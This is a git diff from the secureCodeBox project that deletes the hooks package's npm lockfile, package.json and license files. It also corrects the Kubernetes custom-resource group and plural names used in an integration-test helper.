"sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==" - }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "requires": { - "balanced-match": "^1.0.0" - } - }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "dependencies": { - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "requires": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true - }, - "undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "requires": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/hooks/package-lock.json.license b/hooks/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/package.json b/hooks/package.json deleted file mode 100644 index 8fcb86cfc9..0000000000 --- a/hooks/package.json +++ /dev/null @@ -1,50 +0,0 @@ -{ - "name": "@securecodebox/hooks", - "version": "1.0.0", - "description": "NPM library to easily set up new hooks for the secureCodeBox", - "homepage": "https://www.secureCodeBox.io", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "index.js", - "directories": { - "example": "example" - }, - "scripts": { - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hooks" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Jannik Hollenbach", - "url": "https://github.com/J12934" - }, - { - "name": "Robert Seedorff", - "url": "https://github.com/rseedorff" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "devDependencies": { - "@types/jest": "^29.5.14", - "jest": "^29.7.0", - "ts-jest": "^29.2.5" - }, - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - } -} diff --git a/hooks/package.json.license b/hooks/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/tests/integration/helpers.ts b/tests/integration/helpers.ts index 01ec034375..16bb418940 100644 --- a/tests/integration/helpers.ts +++ b/tests/integration/helpers.ts @@ -294,9 +294,9 @@ export async function cascadingScan( } const scans = await k8sApis.k8sCRDApi.listNamespacedCustomObject({ - group: "execution.securecodebox.io/v1", + group: "execution.securecodebox.io", version: "v1", - plural: "Scan", + plural: "scans", namespace, }); From 0674e5fd60fdbc3369472d3bd361361c398fc9c3 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 18:32:39 +0200 Subject: [PATCH 084/137] Apply prettier to all hook code --- hooks/cascading-scans/hook/hook.test.js | 162 ++++---- hooks/cascading-scans/hook/hook.ts | 79 ++-- .../hook/kubernetes-label-selector.test.js | 30 +- .../hook/kubernetes-label-selector.ts | 8 +- hooks/cascading-scans/hook/scan-helpers.ts | 52 +-- .../hook/scope-limiter.test.js | 16 +- hooks/cascading-scans/hook/scope-limiter.ts | 40 +- hooks/finding-post-processing/hook/hook.js | 2 +- .../finding-post-processing/hook/hook.test.js | 347 +++++++++--------- 